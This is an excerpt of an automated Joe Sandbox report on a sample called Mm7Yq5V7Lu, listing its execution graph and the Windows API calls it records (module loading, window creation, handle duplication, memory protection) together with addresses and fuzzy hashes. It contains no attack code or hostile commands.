                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378638983-0
                                                                                                                                                        • Opcode ID: 1ae35da939578676d8bca1ad244184186f539953612d2c43ea977f4a9f501924
                                                                                                                                                        • Instruction ID: 3fa521639440aa6c9fccf90d9a2e99ba164f539e1ca9f63bc7d99f383ab0268b
                                                                                                                                                        • Opcode Fuzzy Hash: 1ae35da939578676d8bca1ad244184186f539953612d2c43ea977f4a9f501924
                                                                                                                                                        • Instruction Fuzzy Hash: 2711E5B59002499FDB10DF99D489BDEBBF8EF88324F14845AD919B7740C374A944CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:9.6%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                        Total number of Nodes:149
                                                                                                                                                        Total number of Limit Nodes:19

                                                                                                                                                        Graph

                                                                                                                                                        execution_graph 20061 708e4a8 20062 708e4f0 VirtualProtect 20061->20062 20063 708e52a 20062->20063 20073 2c463f0 20074 2c46400 20073->20074 20078 2c4691f 20074->20078 20083 2c46858 20074->20083 20075 2c46411 20079 2c46924 20078->20079 20080 2c46989 20079->20080 20088 2c46ac0 20079->20088 20092 2c46ab0 20079->20092 20080->20075 20084 2c46892 20083->20084 20085 2c46989 20084->20085 20086 2c46ac0 5 API calls 20084->20086 20087 2c46ab0 5 API calls 20084->20087 20085->20075 20086->20085 20087->20085 20089 2c46acd 20088->20089 20090 2c46b07 20089->20090 20096 2c4672c 20089->20096 20090->20080 20093 2c46ac0 20092->20093 20094 2c4672c 5 API calls 20093->20094 20095 2c46b07 20093->20095 20094->20095 20095->20080 20097 2c46737 20096->20097 20099 2c473f8 20097->20099 20100 2c4682c 20097->20100 20101 2c46837 20100->20101 20105 2c4b860 20101->20105 20114 2c4b870 20101->20114 20102 2c478a0 20102->20099 20107 2c4b8a1 20105->20107 20108 2c4b993 20105->20108 20106 2c4b8ad 20106->20102 20107->20106 20123 2c4bbb8 20107->20123 20127 2c4bba9 20107->20127 20108->20102 20109 2c4b8ee 20131 2c4cec8 20109->20131 20141 2c4ceba 20109->20141 20116 2c4b8a1 20114->20116 20118 2c4b993 20114->20118 20115 2c4b8ad 20115->20102 20116->20115 20119 2c4bbb8 4 API calls 20116->20119 20120 2c4bba9 4 API calls 20116->20120 20117 2c4b8ee 20121 2c4cec8 2 API calls 20117->20121 20122 2c4ceba 2 API calls 20117->20122 20118->20102 20119->20117 20120->20117 20121->20118 20122->20118 20124 2c4bbc2 20123->20124 20151 2c4bbf8 20123->20151 20160 2c4bc08 20123->20160 20124->20109 20129 2c4bbf8 3 API calls 20127->20129 20130 2c4bc08 3 API calls 20127->20130 20128 2c4bbc2 20128->20109 20129->20128 20130->20128 20132 2c4cef2 20131->20132 20187 2c4d3c0 20132->20187 20192 2c4d3b0 20132->20192 20133 2c4cf70 20134 2c4afa8 GetModuleHandleW 20133->20134 20136 2c4cf99 20133->20136 20135 2c4cfc3 20134->20135 20139 2c4db61 CreateWindowExW 20135->20139 20140 2c4dc68 CreateWindowExW 20135->20140 20139->20136 20140->20136 20142 2c4cec8 20141->20142 20147 2c4d3c0 GetModuleHandleW 20142->20147 20148 2c4d3b0 GetModuleHandleW 20142->20148 20143 2c4cf70 20144 2c4afa8 GetModuleHandleW 20143->20144 20145 2c4cf99 20143->20145 20146 2c4cfc3 20144->20146 20145->20145 20217 2c4dc68 20146->20217 20220 2c4db61 20146->20220 20147->20143 20148->20143 20169 2c4afa8 20151->20169 20154 2c4bc33 20154->20124 20155 2c4bc2b 20155->20154 20156 2c4be30 GetModuleHandleW 20155->20156 20157 2c4be5d 20156->20157 20157->20124 20161 2c4bc1b 20160->20161 20162 2c4afa8 GetModuleHandleW 20160->20162 20163 2c4bc33 20161->20163 20167 2c4be80 2 API calls 20161->20167 20168 2c4be90 2 API calls 20161->20168 20162->20161 20163->20124 20164 2c4bc2b 20164->20163 20165 2c4be30 GetModuleHandleW 20164->20165 20166 2c4be5d 20165->20166 20166->20124 20167->20164 20168->20164 20170 2c4bde8 GetModuleHandleW 20169->20170 20172 2c4bc1b 20170->20172 20172->20154 20173 2c4be90 20172->20173 20178 2c4be80 20172->20178 20174 2c4afa8 GetModuleHandleW 20173->20174 20176 2c4bea4 20173->20176 20174->20176 20175 2c4bec9 20175->20155 20176->20175 20183 2c4b000 20176->20183 20179 2c4afa8 GetModuleHandleW 20178->20179 20180 2c4bea4 20179->20180 20181 2c4bec9 20180->20181 20182 2c4b000 LoadLibraryExW 20180->20182 20181->20155 20182->20181 20184 2c4c070 LoadLibraryExW 20183->20184 20186 2c4c0e9 20184->20186 20186->20175 20188 2c4d3ed 20187->20188 20189 2c4d46e 20188->20189 20197 2c4d530 20188->20197 20207 2c4d521 20188->20207 20193 2c4d3c0 20192->20193 20194 2c4d46e 20193->20194 20195 2c4d530 GetModuleHandleW 20193->20195 20196 2c4d521 GetModuleHandleW 20193->20196 20195->20194 20196->20194 20198 2c4d545 20197->20198 20199 2c4afa8 GetModuleHandleW 20198->20199 20200 2c4d569 20198->20200 20199->20200 20201 2c4afa8 GetModuleHandleW 20200->20201 20206 2c4d725 20200->20206 20202 2c4d6ab 20201->20202 20203 2c4afa8 GetModuleHandleW 20202->20203 20202->20206 20204 2c4d6f9 20203->20204 20205 2c4afa8 GetModuleHandleW 20204->20205 20204->20206 20205->20206 20206->20189 20208 2c4d545 20207->20208 20209 2c4afa8 GetModuleHandleW 20208->20209 20210 2c4d569 20208->20210 20209->20210 20211 2c4afa8 GetModuleHandleW 20210->20211 20213 2c4d725 20210->20213 20212 2c4d6ab 20211->20212 20212->20213 20214 2c4afa8 GetModuleHandleW 20212->20214 20213->20189 20215 2c4d6f9 20214->20215 20215->20213 20216 2c4afa8 GetModuleHandleW 20215->20216 20216->20213 20218 2c4dc9d 20217->20218 20223 2c4b13c 20217->20223 20218->20145 20221 2c4b13c CreateWindowExW 20220->20221 20222 2c4dc9d 20221->20222 20222->20145 20224 2c4dcb8 CreateWindowExW 20223->20224 20226 2c4dddc 20224->20226 20064 2c4e0a3 20066 2c4e0aa 20064->20066 20065 2c4e1f9 20066->20065 20068 2c4ded0 20066->20068 20069 2c4dee8 SetWindowLongW 20068->20069 20072 2c4b174 SetWindowLongW 20068->20072 20069->20065 20071 2c4df6c 20069->20071 20071->20065 20072->20069 20042 2c46bd8 20043 2c46c3e 20042->20043 20044 2c46ced 20043->20044 20047 2c46d98 20043->20047 20050 2c46d89 20043->20050 20048 2c46dc6 20047->20048 20057 2c467cc 20047->20057 20048->20044 20051 2c46d92 20050->20051 20052 2c46dfa DuplicateHandle 20050->20052 20054 2c467cc DuplicateHandle 20051->20054 20056 2c46e96 20052->20056 20055 2c46dc6 20054->20055 20055->20044 20056->20044 20058 2c46e00 DuplicateHandle 20057->20058 20060 2c46e96 20058->20060 20060->20048

                                                                                                                                                        Executed Functions

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 198 2c4bc08-2c4bc10 199 2c4bc1b-2c4bc1d 198->199 200 2c4bc16 call 2c4afa8 198->200 201 2c4bc33-2c4bc37 199->201 202 2c4bc1f 199->202 200->199 203 2c4bc39-2c4bc43 201->203 204 2c4bc4b-2c4bc8c 201->204 251 2c4bc25 call 2c4be80 202->251 252 2c4bc25 call 2c4be90 202->252 203->204 209 2c4bc8e-2c4bc96 204->209 210 2c4bc99-2c4bca7 204->210 205 2c4bc2b-2c4bc2d 205->201 206 2c4bd68-2c4be28 205->206 246 2c4be30-2c4be5b GetModuleHandleW 206->246 247 2c4be2a-2c4be2d 206->247 209->210 212 2c4bca9-2c4bcae 210->212 213 2c4bccb-2c4bccd 210->213 214 2c4bcb0-2c4bcb7 call 2c4afb4 212->214 215 2c4bcb9 212->215 216 2c4bcd0-2c4bcd7 213->216 220 2c4bcbb-2c4bcc9 214->220 215->220 217 2c4bce4-2c4bceb 216->217 218 2c4bcd9-2c4bce1 216->218 222 2c4bced-2c4bcf5 217->222 223 2c4bcf8-2c4bd01 call 2c4afc4 217->223 218->217 220->216 222->223 228 2c4bd03-2c4bd0b 223->228 229 2c4bd0e-2c4bd13 223->229 228->229 231 2c4bd15-2c4bd1c 229->231 232 2c4bd31-2c4bd3e 229->232 231->232 234 2c4bd1e-2c4bd2e call 2c499b0 call 2c4afd4 231->234 237 2c4bd40-2c4bd5e 232->237 238 2c4bd61-2c4bd67 232->238 234->232 237->238 248 2c4be64-2c4be78 246->248 249 2c4be5d-2c4be63 246->249 247->246 249->248 251->205 252->205
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: f97e08906fa7b5cc8931a9ac78961d0d4a791332f62910913e8c39182e070584
                                                                                                                                                        • Instruction ID: 842b0f3f656b83cf2d10f4d6963760103aa297a297e881274f6ffefb1f5d881d
                                                                                                                                                        • Opcode Fuzzy Hash: f97e08906fa7b5cc8931a9ac78961d0d4a791332f62910913e8c39182e070584
                                                                                                                                                        • Instruction Fuzzy Hash: CE713570A00B058FD724DF6AC19579BBBF1BF88218F008A2ED446D7A40DB35E906CF91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 253 2c4b13c-2c4dd1e 255 2c4dd20-2c4dd26 253->255 256 2c4dd29-2c4dd30 253->256 255->256 257 2c4dd32-2c4dd38 256->257 258 2c4dd3b-2c4ddda CreateWindowExW 256->258 257->258 260 2c4dde3-2c4de1b 258->260 261 2c4dddc-2c4dde2 258->261 265 2c4de1d-2c4de20 260->265 266 2c4de28 260->266 261->260 265->266 267 2c4de29 266->267 267->267
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C4DDCA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                        • Opcode ID: 5f935d5dac10c51254a7aef159c732cf71228804282a475c5811062a58e9abdf
                                                                                                                                                        • Instruction ID: c682e9be3d0d92e0623efde30db211e9c8cbc4ada6eb2983c105a23d71cc377c
                                                                                                                                                        • Opcode Fuzzy Hash: 5f935d5dac10c51254a7aef159c732cf71228804282a475c5811062a58e9abdf
                                                                                                                                                        • Instruction Fuzzy Hash: 6D51DFB1D00309DFDF14DF99C884ADEBBB5BF88314F24812AE819AB210DB709985CF90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 268 2c4dcad-2c4dd1e 269 2c4dd20-2c4dd26 268->269 270 2c4dd29-2c4dd30 268->270 269->270 271 2c4dd32-2c4dd38 270->271 272 2c4dd3b-2c4dd73 270->272 271->272 273 2c4dd7b-2c4ddda CreateWindowExW 272->273 274 2c4dde3-2c4de1b 273->274 275 2c4dddc-2c4dde2 273->275 279 2c4de1d-2c4de20 274->279 280 2c4de28 274->280 275->274 279->280 281 2c4de29 280->281 281->281
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C4DDCA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                        • Opcode ID: 352e3a5cfab9910b44468cd378e3e57300be4fc38fb3dfce55978d4c1d0a7d58
                                                                                                                                                        • Instruction ID: 9074786bddefdf59b81b5ebf7396238fe86742b6c371a52e0783be5995a577a8
                                                                                                                                                        • Opcode Fuzzy Hash: 352e3a5cfab9910b44468cd378e3e57300be4fc38fb3dfce55978d4c1d0a7d58
                                                                                                                                                        • Instruction Fuzzy Hash: 9F51CEB1D00309DFDF14DFA9C984ADEBBB5BF88314F24852AE819AB210D7749985CF90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 282 2c46d89-2c46d90 283 2c46d92-2c46dc1 call 2c467cc 282->283 284 2c46dfa-2c46e94 DuplicateHandle 282->284 287 2c46dc6-2c46dec 283->287 288 2c46e96-2c46e9c 284->288 289 2c46e9d-2c46eba 284->289 288->289
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C46DC6,?,?,?,?,?), ref: 02C46E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 16552f23614668e00a33cb6e0ea742025e9db22afa25dfd23b81d56e8761baea
                                                                                                                                                        • Instruction ID: ac9d5fdba908a697c3294b7d8bd9dd34f27d2dcb7b607124ec1932396cf77f1b
                                                                                                                                                        • Opcode Fuzzy Hash: 16552f23614668e00a33cb6e0ea742025e9db22afa25dfd23b81d56e8761baea
                                                                                                                                                        • Instruction Fuzzy Hash: 224169B69002099FCF01CF98D945ADEBBF9FF49320F19846AEA14A7360C7349915DFA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 294 2c46ebf-2c46ecc 295 2c46ece-2c46eda 294->295 296 2c46e79-2c46e94 DuplicateHandle 294->296 297 2c46ee6-2c46fee 295->297 298 2c46e96-2c46e9c 296->298 299 2c46e9d-2c46eba 296->299 298->299
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C46DC6,?,?,?,?,?), ref: 02C46E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: d55417da0122bbab0f0bfa60047fa9966bfb10c150da102d024b484115826f3e
                                                                                                                                                        • Instruction ID: ede8e10799861edd69caf8015147aff76e37daf8a5aaff3019264ad65c26ab42
                                                                                                                                                        • Opcode Fuzzy Hash: d55417da0122bbab0f0bfa60047fa9966bfb10c150da102d024b484115826f3e
                                                                                                                                                        • Instruction Fuzzy Hash: E031437AA553408FEB009B64F44E66EBBE9FF89301F14882AE9418BBD5DF746804CB10
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 312 2c4dec0-2c4ded7 313 2c4dedd-2c4dedf 312->313 314 2c4ded9-2c4dedb 312->314 315 2c4dee5 313->315 316 2c4dee1-2c4dee3 call 2c4b174 313->316 314->313 318 2c4dee8-2c4df6a SetWindowLongW 315->318 316->315 319 2c4df73-2c4df87 318->319 320 2c4df6c-2c4df72 318->320 320->319
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,02C4DEE8,?,?,?,?), ref: 02C4DF5D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378638983-0
                                                                                                                                                        • Opcode ID: 40e49fe5c9d0038ed5c812ed6f806e19bf70b53d947f6e062c7db38e58e4a319
                                                                                                                                                        • Instruction ID: 0af1443a35f35b3a249312a857a3e286491fb7138d2ae164794498662f6bf82d
                                                                                                                                                        • Opcode Fuzzy Hash: 40e49fe5c9d0038ed5c812ed6f806e19bf70b53d947f6e062c7db38e58e4a319
                                                                                                                                                        • Instruction Fuzzy Hash: A9217AB5C00249DFCB11DFA4D545BDABBF4EF49324F08849AD455AB252C335A904CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 322 2c467cc-2c46e94 DuplicateHandle 325 2c46e96-2c46e9c 322->325 326 2c46e9d-2c46eba 322->326 325->326
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C46DC6,?,?,?,?,?), ref: 02C46E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: af9a8d22e3fa7afc16161e26e4ae81d7a7962cf55c1caf62626fe513df36269b
                                                                                                                                                        • Instruction ID: bff4ed2abc1f8cd719050c686fe34a1125636c499dd9f3636dabc3ca38efc8d8
                                                                                                                                                        • Opcode Fuzzy Hash: af9a8d22e3fa7afc16161e26e4ae81d7a7962cf55c1caf62626fe513df36269b
                                                                                                                                                        • Instruction Fuzzy Hash: 3F21E3B5900259EFDB10CFAAD984ADEBBF8EF49324F14841AE914B3350D374A954CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 329 2c46df8-2c46e72 330 2c46e79-2c46e94 DuplicateHandle 329->330 331 2c46e96-2c46e9c 330->331 332 2c46e9d-2c46eba 330->332 331->332
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C46DC6,?,?,?,?,?), ref: 02C46E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 2993541c0495d17e16be85fd95017ae83a4a3f76814ea8068d68266089e6fd91
                                                                                                                                                        • Instruction ID: 0b695a447f9a6524cacb6af3d1be1246483f8ce619c2030aa7cc46b3cf46f822
                                                                                                                                                        • Opcode Fuzzy Hash: 2993541c0495d17e16be85fd95017ae83a4a3f76814ea8068d68266089e6fd91
                                                                                                                                                        • Instruction Fuzzy Hash: 6421E0B69002499FDB10CFA9D984ADEBBF8FF48324F14841AE914B3350C378A955CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 335 2c4b000-2c4c0b0 337 2c4c0b2-2c4c0b5 335->337 338 2c4c0b8-2c4c0e7 LoadLibraryExW 335->338 337->338 339 2c4c0f0-2c4c10d 338->339 340 2c4c0e9-2c4c0ef 338->340 340->339
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C4BEC9,00000800,00000000,00000000), ref: 02C4C0DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        • Opcode ID: af89c03b2825d2f6d9afad1b0b5f90dea90f763d2f203fed1c0a121f21909145
                                                                                                                                                        • Instruction ID: 2ed2e754671eb22e5c0028de370d6f9c49004fb88c807cc9c1b151825f480371
                                                                                                                                                        • Opcode Fuzzy Hash: af89c03b2825d2f6d9afad1b0b5f90dea90f763d2f203fed1c0a121f21909145
                                                                                                                                                        • Instruction Fuzzy Hash: D01103B69012099FCB20CF9AC544BDEFBF4EB88324F14842AE915B7610C775AA45CFA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 343 708e4a8-708e528 VirtualProtect 345 708e52a-708e530 343->345 346 708e531-708e552 343->346 345->346
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0708E51B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.424456988.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_7080000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                        • Opcode ID: d8530f6dc2d5eca154bff264fafd87dc391b5350f193a8d11c9cf3aad0e58de2
                                                                                                                                                        • Instruction ID: d9940ac1664b364d59a32d205bf9fade52caa05196547c111935186e3a8b9c2d
                                                                                                                                                        • Opcode Fuzzy Hash: d8530f6dc2d5eca154bff264fafd87dc391b5350f193a8d11c9cf3aad0e58de2
                                                                                                                                                        • Instruction Fuzzy Hash: 3F2117B19002099FCB10DF9AC484BDEFBF4FF48320F148429E558A3240D374A545CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 348 2c4c068-2c4c0b0 349 2c4c0b2-2c4c0b5 348->349 350 2c4c0b8-2c4c0e7 LoadLibraryExW 348->350 349->350 351 2c4c0f0-2c4c10d 350->351 352 2c4c0e9-2c4c0ef 350->352 352->351
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C4BEC9,00000800,00000000,00000000), ref: 02C4C0DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        • Opcode ID: 16c0e025eb80f82ec71e988d08e5d58f48163e9b58fbd64e85c5f729db1b4e84
                                                                                                                                                        • Instruction ID: 6212811d36c770453c8dd1c4b4d7c8b2ffc1fb83768ff6cc40d51b427231868a
                                                                                                                                                        • Opcode Fuzzy Hash: 16c0e025eb80f82ec71e988d08e5d58f48163e9b58fbd64e85c5f729db1b4e84
                                                                                                                                                        • Instruction Fuzzy Hash: CF11E2B69002098FCB10CF9AC544BDEFBF4EB88324F14842EE519B7610C779AA45CFA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 355 2c4afa8-2c4be28 357 2c4be30-2c4be5b GetModuleHandleW 355->357 358 2c4be2a-2c4be2d 355->358 359 2c4be64-2c4be78 357->359 360 2c4be5d-2c4be63 357->360 358->357 360->359
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02C4BC1B), ref: 02C4BE4E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: a71923da08b76d61bf67ee48726a243300e31b21d699bff7c943cf1199030e90
                                                                                                                                                        • Instruction ID: b98d36672b2c13b6acd3183b1a8a76048f35ae15228cec1a081513f8686a2c39
                                                                                                                                                        • Opcode Fuzzy Hash: a71923da08b76d61bf67ee48726a243300e31b21d699bff7c943cf1199030e90
                                                                                                                                                        • Instruction Fuzzy Hash: 3211EFB2D006498BCB10CF9AC444BDBFBF4AF88628F14846AD919A7600D775A945CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 362 2c4b174-2c4b17b 363 2c4df00-2c4df6a SetWindowLongW 362->363 364 2c4df73-2c4df87 363->364 365 2c4df6c-2c4df72 363->365 365->364
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,02C4DEE8,?,?,?,?), ref: 02C4DF5D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000C.00000002.418556157.0000000002C40000.00000040.00000001.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_12_2_2c40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378638983-0
                                                                                                                                                        • Opcode ID: f3d2ee2e8c6258fab95d2e2883836f68c1bb111651bd0a643f1f1a0cf260cd24
                                                                                                                                                        • Instruction ID: 8a5a1e54ca2443e31d023d9b1d13294eff0e514677b3be4964c2acc9f680b4f2
                                                                                                                                                        • Opcode Fuzzy Hash: f3d2ee2e8c6258fab95d2e2883836f68c1bb111651bd0a643f1f1a0cf260cd24
                                                                                                                                                        • Instruction Fuzzy Hash: 631133B19002099FDB20DF99D584BDFBBF8EB88324F10851AE919B3300C375A944CFA5
                                                                                                                                                        Uniqueness

